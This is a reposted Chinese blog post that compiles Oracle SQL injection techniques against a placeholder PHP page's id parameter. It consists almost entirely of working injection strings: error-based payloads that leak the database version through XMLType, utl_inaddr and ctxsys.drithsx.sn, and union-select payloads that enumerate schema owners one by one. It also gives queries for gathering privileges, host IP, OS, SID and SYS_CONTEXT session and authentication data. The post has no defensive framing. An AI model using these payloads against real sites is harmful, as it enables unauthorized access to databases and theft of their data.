oracle注入整理

技術小美發表於2017-11-15
Oracle

第一種方法http://www.xxox.cn/XXX/AA.php?id=1 and and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)- 

第二種方法http://www.xxox.cn/XXX/AA.php?id=1||utl_inaddr.get_host_name((select banner from v$version where rownum=1))– 

第三種方法http://www.xxox.com/XXX/AA.php?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))– 

爆庫方法一:(用 and owner<>’庫名’連線)http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where rownum=1),NULL from dual– 

第二個庫名:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where owner<>’SYS’ and rownum=1),NULL from dual– 

第三個庫名:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,(select owner from all_tables where owner<>’SYS’ and owner<>’SYSTEM’ and rownum=1),NULL from dual– 

依此類推直到返回正常頁面: 

爆庫方法二:http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,data from (select rownum as limit,owner as data from sys.all_tables),NULL where limit=1–            分割http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,data from (select rownum as limit,owner as data from sys.all_tables),NULL where limit=2– 

有時候會重複,例如:limiti=1-10會顯示同樣的內容

oracle 注入資訊收集

1、當前使用者許可權     (select * from session_roles) 

2、當前資料庫版本   (select banner from sys.v_$version where rownum=1) 

3、伺服器出口IP     (用utl_http.request可以實現) 

4、伺服器監聽IP     (select utl_inaddr.get_host_address from dual) 

5、伺服器作業系統   (select member from v$logfile where rownum=1) 

6、伺服器sid        (遠端連線的話需要,select   instance_name   from   v$instance;) 

7、當前連線使用者     (select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual) 

Oracle也可以用sys_context來獲取基本資訊

SYS_CONTEXT(‘USERENV’,’TERMINAL’) terminal, 

SYS_CONTEXT(‘USERENV’,’LANGUAGE’) language, 

SYS_CONTEXT(‘USERENV’,’SESSIONID’) sessionid, 

SYS_CONTEXT(‘USERENV’,’INSTANCE’) instance, 

SYS_CONTEXT(‘USERENV’,’ENTRYID’) entryid, 

SYS_CONTEXT(‘USERENV’,’ISDBA’) isdba, 

SYS_CONTEXT(‘USERENV’,’NLS_TERRITORY’) nls_territory, 

SYS_CONTEXT(‘USERENV’,’NLS_CURRENCY’) nls_currency, 

SYS_CONTEXT(‘USERENV’,’NLS_CALENDAR’) nls_calendar, 

SYS_CONTEXT(‘USERENV’,’NLS_DATE_FORMAT’) nls_date_format, 

SYS_CONTEXT(‘USERENV’,’NLS_DATE_LANGUAGE’) nls_date_language, 

SYS_CONTEXT(‘USERENV’,’NLS_SORT’) nls_sort, 

SYS_CONTEXT(‘USERENV’,’CURRENT_USER’) current_user, 

SYS_CONTEXT(‘USERENV’,’CURRENT_USERID’) current_userid, 

SYS_CONTEXT(‘USERENV’,’SESSION_USER’) session_user, 

SYS_CONTEXT(‘USERENV’,’SESSION_USERID’) session_userid, 

SYS_CONTEXT(‘USERENV’,’PROXY_USER’) proxy_user, 

SYS_CONTEXT(‘USERENV’,’PROXY_USERID’) proxy_userid, 

SYS_CONTEXT(‘USERENV’,’DB_DOMAIN’) db_domain, 

SYS_CONTEXT(‘USERENV’,’DB_NAME’) db_name, 

SYS_CONTEXT(‘USERENV’,’HOST’) host, 

SYS_CONTEXT(‘USERENV’,’OS_USER’) os_user, 

SYS_CONTEXT(‘USERENV’,’EXTERNAL_NAME’) external_name, 

SYS_CONTEXT(‘USERENV’,’IP_ADDRESS’) ip_address, 

SYS_CONTEXT(‘USERENV’,’NETWORK_PROTOCOL’) network_protocol, 

SYS_CONTEXT(‘USERENV’,’BG_JOB_ID’) bg_job_id, 

SYS_CONTEXT(‘USERENV’,’FG_JOB_ID’) fg_job_id, 

SYS_CONTEXT(‘USERENV’,’AUTHENTICATION_TYPE’) authentication_type, 

SYS_CONTEXT(‘USERENV’,’AUTHENTICATION_DATA’) authentication_data 

例1:

http://www.xxox.cn/XXX/AA.php?id=1||utl_inaddr.get_host_name((SYS_CONTEXT(‘USERENV’,`TERMINAL’)))–

例2:

http://www.xxox.com/XXX/AA.php?id=1 and 1=2 union select NULL,NULL,NULL,NULL,NULL,NULL,SYS_CONTEXT(‘USERENV’,`TERMINAL’),NULL from dual–

 

本文轉hackfreer51CTO部落格,原文連結:http://blog.51cto.com/pnig0s1992/464568,如需轉載請自行聯絡原作者


相關文章